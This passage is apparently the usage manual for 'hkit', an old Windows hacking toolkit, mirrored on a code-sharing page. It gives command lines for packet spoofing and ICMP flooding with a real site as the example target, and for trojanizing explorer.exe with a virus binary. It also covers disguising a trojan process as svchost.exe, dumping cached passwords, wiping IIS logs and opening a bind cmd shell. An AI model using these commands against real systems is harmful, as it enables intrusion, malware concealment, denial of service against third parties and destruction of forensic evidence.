?? 29a-7.006
字號:
the service.
Use "hkit /service /boottype ServiceName /auto|demand|boot|system|disabled"
to change service boot type.
3. Packet-related (crcpkt & spoofer)
Use "hkit /crcpkt packetfile" to recalculate IP/ICMP/UDP/TCP csum(s) of
the specified file, containing IP packet.
Use "hkit /spoofer packetfile [ntimes|0=infinite] [dst_ip]" to send that
packetfile to some IP.
If <dst_ip> is not specified, address is taken from
the IP_header.Dst_IP field.
4. Sniffer
Use "hkit /sniffer outfile|basepath|NULL [option(s)]" to invoke
the raw-socket sniffer.
If "NULL" is specified as an output file name, no output file(s)
are generated.
If "/1" is specified within options, single file is written.
Otherwise directory with some sub-directories are created,
containing many files inside.
You can specify "/input=<infile>" to tell sniffer that input packets
should be taken from file, not from network.
This can be previously sniffed file, or SNORT'ed file (then use "/insnort").
Broken snort'ed files are repaired.
If "/1" is NOT specified, you can use "/r" to write tcp sessions
as a single files, instead of writing multiple files per each packet.
Also here "/s" can be specified, to skip IP header's.
Each TCP session is written as two files: input and output data.
When processing (reading/writing) files,
use "/rt", "/wt", "/rl", "/wl" to read/write packet Timestamp and/or Length.
NOTE: if you have specified "/wt" and/or "/wl" when sniffing,
you should specify the same "/rt" and/or "/rl" combination
when reading corresponding file.
Use "/tcp|udp|icmp+|-" to include/exclude protocols.
For example, "/tcp-" will exclude tcp from being sniffed,
while using "/udp+ /icmp+" will sniff ONLY udp and icmp.
Use "/ip+|-<ip_mask>" to specify IP mask to be sniffed.
For example, "/ip-192.168.*.*" will exclude lan from being sniffed,
while "/ip+123.*.*.*" will sniff ONLY the specified range.
Up to 1024 IP masks/addresses can be specified.
Use "/v" to verbosely dump sniffed packets (line per packet).
Use "/ip=<ip>,alias" to rename IP within dump.
4ex: "/ip=192.168.0.1,gateway"
Use "/http" and/or "/dns" to dump http/dns requests/reply details.
Use "/log=logfile" to write dump into log file.
Use "/f" to flush files after each write operation.
Options can be also specified in the following locations:
- current_directory\hkit.cfg
- path:\<argv0>.cfg
- command line
To sniff & see packet info in the console:
"hkit /sniffer null /v /http /dns"
To sniff into single file, use:
"hkit /sniffer sniffed.bin /1 /wl /wt"
To re-process sniffed file, use:
"hkit /sniffer /input=sniffed.bin /rl /rt sniffed2.bin /v"
To sniff in 1packet-->1file mode, use:
"hkit /sniffer sniffed /v"
To sniff in 1packet-->1file mode, but merge tcp sessions:
"hkit /sniffer sniffed /v /r /s"
5. ICMP Pinger/Scanner/Spoofer/Flooder
Use "hkit /ping <ip|host> -n count" to ping host count times.
Specified IP is a destination IP written into sending packet.
Use "-pktsrc addr" to specify source IP written into packet.
Use "-intsrc addr" to specify source interface IP.
Use "-intdst addr" to specify destination interface IP.
Use "-l size" to specify ping's payload size.
Use "-nw" to force flood mode -- i.e. dont wait for replies.
Use "-w timeout" to specify pong wait timeout, in milliseconds.
Use "-scan -n count" to scan count hosts, starting from specified IP.
Use "-fastscan" instead of "-scan" to use parallel scanner
(two threads - sending and receiving).
Pinger: "hkit /ping www.microsoft.com"
Scanner: "hkit /ping www.microsoft.com -fastscan -n 256 -w 10000"
Spoofer/Flooder: "hkit /ping www.microsoft.com -pktsrc fuck.org -nw -n 0"
6. Registry
Use "hkit /reg /dumpall" to save all accessible data into
regedit-compatible file.
Use "hkit /reg keyword(s)" to search for at least one keyword
within each processed key/value/data set.
Use "hkit /reg /all keyword(s)" to search for ALL keywords
within each processed key/value/data set.
Options:
Use "/key-", "/data-", "/value-" to disable searching within key/data/value.
Use "/c" to enable case-sensitive search.
Use "/findascii" to search ONLY within ascii data format.
Use "/findunicode" to search ONLY within unicode data format.
Use "/outfile=filename" to change output file from hkit.reg to filename.
Use "/outunicode" to force REGEDIT5-compatible output format.
(default is asciim, REGEDIT4-compatible)
Use "/text-" to disable ascii commentaries corresponding to hex data dump.
Use "/fillout" to fill output data with X'es or 0's.
This is useful to wipe specified registry keys.
Example: "hkit /reg /outfile=con icq"
7. Disassembler/trojanizer (previously REVERT tool, MISTFALL-based)
Use "hkit /revert explorer.exe explorer2.exe --mode=virus:abc
--virus-va:00401234"
example says: disassemble explorer.exe, insert binary file 'abc'
at address 401234, and link it all into new file explorer2.exe.
8. Binary --> source/echo conversion
Use "hkit /bin2src /asm|pas|cpp 123.bin" to produce 123.inc containing
"DB 55,66,77,..."-like commands.
Use "hkit /bin2src /bin|asm|pas|cpp 123.bin /S=$START$ /E=$END$ @txt"
to search for '$START$'/'$END$' signatures within 123.bin,
and write everything between them as an array named 'txt'
into 123.bin|ash|inc|cpp-file.
Use "hkit /bin2bat somefile.exe batfile.bat targetfile.exe"
to produce batfile.bat from somefile.exe,
which, when executed, constructs targetfile.exe.
Source file will be split into 64k-blocks, each of them will be
packed and converted into self-extracting ascii .com-file.
Resulting .bat file will ECHO and RUN these .com-files,
and then append resulting 64k-blocks to targetfile.exe using 'copy /b'.
9. FakeExec
This is new (and EXPERIMENTAL !!!) technology allowing you
to fake [existing] process' file name or pid.
As a result, ntquerysysteminformation (taskmgr) & psapi (module list)
returns something like svchost.exe, while real executed process were
kind of trojan.exe.
It is very complex stuff, which consists of patching PEB
in the corresponding process' context, and patching system structures
through PhysicalMemory device, and except that, ring0 entering were used,
and this all were complicated by internal structures mismatch
in the 2K/XP systems.
So you should understand, that in some cases it doesnt work,
and in other cases it can crash system ;-)
It should be executed as the following:
"hkit /fakeexec notepad.exe calc.exe" -- exec notepad and change name to calc
"hkit /fakeexec bsodomon.exe 31337" -- exec process and change pid to 31337
"hkit /fakeexec 666 31337" -- find process with pid=666 and set pid to 31337
"hkit /fakeexec 666 svchost.exe" -- find process with pid=666 and change name
WARNING!
When process's pid is changed, on that process exit system will
(in most cases) do BSOD.
10. API<-->CRC conversion
Use "hkit /crc /dll2crc kernel32.dll" to dump crc for each exported api.
Use "hkit /crc /dll2api kernel32.dll View" to find all exported functions
containing word "View" and corresponding crcs.
Use "hkit /crc /api2crc CreateFileA" to calculate crc32 for "CreateFileA".
Use "hkit /crc /crc2api kernel32.dll A89B382F" to find exported function with
specified crc32.
11. Other shit
Use "hkit /showpass" to show cached password on NT/2K systems,
(used PasswordReminder sources)
Use "hkit /md5 file" to calculate file's md5 checksum.
NOTE: file is threated as BINARY, not an ASCII file.
Use 'hkit /md5 "phrase"' to calculate phrase's md5 checksum.
Use "hkit /http ip port 10 20 req" to send file req to ip:port,
and then dump reply; waiting 10 seconds for connect(),
and 20 seconds for recv().
Use "hkit /iislog" to clean IIS logs, even if IIS is running now.
Use "hkit /savehkcu hkcu.reg" to save HKEY_CURRENT_USER into hkcu.reg file in
binary form.
Use "hkit /error 187" to show error code's description.
Use "hkit /nterror c0000001" to show nt error's description.
Use "hkit /telnetd ip port" to listen on ip:port for incoming connections,
giving cmd shell. If ip is 0, listens on all addresses.
* * *
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -